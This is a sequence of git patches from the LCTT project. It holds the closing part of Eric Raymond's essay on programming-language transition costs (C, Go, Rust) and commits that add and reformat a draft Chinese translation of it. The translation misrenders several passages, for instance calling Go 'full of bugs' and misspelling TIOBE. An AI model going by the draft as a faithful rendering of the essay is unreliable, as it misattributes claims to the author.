FORTRAN, Pascal, assemblers and LISP. I noticed back in the 1980s that I could often spot a new C programmer’s last language by his coding style, which was just the flip side of saying that C was damn good at gathering all those tribes unto itself. - -C++ also benefited from having low transition costs in. Later, most new languages at least partly copied C syntax in order to minimize them.Notice what this does to the context of future language designs: it raises the value of being a C-like as possible in order to minimize inward transition costs from anywhere. - -Another way to minimize inward transition costs is to simply be ridiculously easy to learn, even to people with no prior programming experience. This, however, is remarkably hard to pull off. I evaluate that only one language – Python – has made the major leagues by relying on this quality. I mention it only in passing because it’s not a strategy I expect to see a  _systems_  language execute successfully, though I’d be delighted to be wrong about that. - -So here we are in late 2017, and…the next part is going to sound to some easily-annoyed people like Go advocacy, but it isn’t. Go, itself, could turn out to fail in several easily imaginable ways. It’s troubling that the Go team is so impervious to some changes their user community is near-unanimously and rightly (I think) insisting it needs. Worst-case GC latency, or the throughput sacrifices made to lower it, could still turn out to drastically narrow the language’s application range. - -That said, there is a grand strategy expressed in the Go design that I think is right. To understand it, we need to review what the near problem for a C replacement is. As I noted in the prequels, it is rising defect rates as systems projects scale up – and specifically memory-management bugs because that category so dominates crash bugs and security exploits. - -We’ve now identified two really powerful imperatives for a C replacement: (1) solve the memory-management problem, and (2) minimize inward-transition costs from C. And the history – the praxeological context – of programming languages tells us that if a C successor candidate don’t address the transition-cost problem effectively enough, it almost doesn’t matter how good a job it does on anything else. Conversely, a C successor that  _does_  address transition costs well buys itself a lot of slack for not being perfect in other ways. - -This is what Go does. It’s not a theoretical jewel; it has annoying limitations; GC latency presently limits how far down the stack it can be pushed. But what it is doing is replicating the Unix/C infective strategy of being easy-entry and  _good enough_  to propagate faster than alternatives that, if it didn’t exist, would look like better far bets. - -Of course, the proboscid in the room when I say that is Rust. Which is, in fact, positioning itself as the better far bet. I’ve explained in previous installments why I don’t think it’s really ready to compete yet. The TIOBE and PYPL indices agree; it’s never made the TIOBE top 20 and on both indices does quite poorly against Go. - -Where Rust will be in five years is a different question, of course. My advice to the Rust community, if they care, is to pay some serious attention to the transition-cost problem. My personal experience says the C to Rust energy barrier is  _[nasty][2]_ . Code-lifting tools like Corrode won’t solve it if all they do is map C to unsafe Rust, and if there were an easy way to automate ownership/lifetime annotations they wouldn’t be needed at all – the compiler would just do that for you. I don’t know what a solution would look like, here, but I think they better find one. - -I will finally note that Ken Thompson has a history of designs that look like minimal solutions to near problems but turn out to have an amazing quality of openness to the future, the capability to  _be improved_ . Unix is like this, of course. It makes me very cautious about supposing that any of the obvious annoyances in Go that look like future-blockers to me (like, say, the lack of generics) actually are. Because for that to be true, I’d have to be smarter than Ken, which is not an easy thing to believe. - --------------------------------------------------------------------------------- - -via: http://esr.ibiblio.org/?p=7745 - -作者:[Eric Raymond ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://esr.ibiblio.org/?author=2 -[1]:http://esr.ibiblio.org/?author=2 -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 -[3]:http://esr.ibiblio.org/?p=7745 From 7dcccf46774a40fb98c5e7486f350deefba98722 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:02:20 +0800 Subject: [PATCH 0291/1627] Create Language engineering for great justice Translated by ValoniaK --- .../Language engineering for great justice | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 translated/tech/Language engineering for great justice diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice new file mode 100644 index 0000000000..d26f9319bd --- /dev/null +++ b/translated/tech/Language engineering for great justice @@ -0,0 +1,24 @@ +最合理的语言工程模式 +当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 +对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 +在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 +在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 +现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? +所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 +在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 +如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 +这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 +在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! +相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 +C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 +另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 +今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 +即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 +我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 +这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 +当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 +五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 +在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + + From cd6d66fe6f58d5adcba7341a874dc048e04daab6 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 19:09:44 +0800 Subject: [PATCH 0292/1627] Language engineering for great justice. Translated by Valoniakim --- .../Language engineering for great justice. | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 translated/tech/Language engineering for great justice. diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice. new file mode 100644 index 0000000000..7f982e0d19 --- /dev/null +++ b/translated/tech/Language engineering for great justice. @@ -0,0 +1,24 @@ +# 最合理的语言工程模式 +## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 +## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 +## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 +## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 +## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? +## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 +## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 +## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 +## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 +## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! +## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 +## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 +## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 +## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 +## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 +## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 +## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 +## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 +## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 +## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + + From adb1eaa60d0c60f2b0ba14d36f52109cffa3be9e Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 20:11:40 +0800 Subject: [PATCH 0293/1627] Update Language engineering for great justice. Translated by Valoniakim --- .../Language engineering for great justice. | 83 +++++++++++++------ 1 file changed, 59 insertions(+), 24 deletions(-) diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice. index 7f982e0d19..301337b11c 100644 --- a/translated/tech/Language engineering for great justice. +++ b/translated/tech/Language engineering for great justice. @@ -1,24 +1,59 @@ -# 最合理的语言工程模式 -## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 -## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 -## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 -## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 -## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? -## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 -## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 -## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 -## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 -## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! -## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 -## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 -## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 -## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 -## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 -## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 -## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 -## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 -## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 -## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 - - + -最合理的语言工程模式 + -============================================================ + - + -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 + - + -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 + - + -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 + - + -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 + - + -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? + - + -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 + - + -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 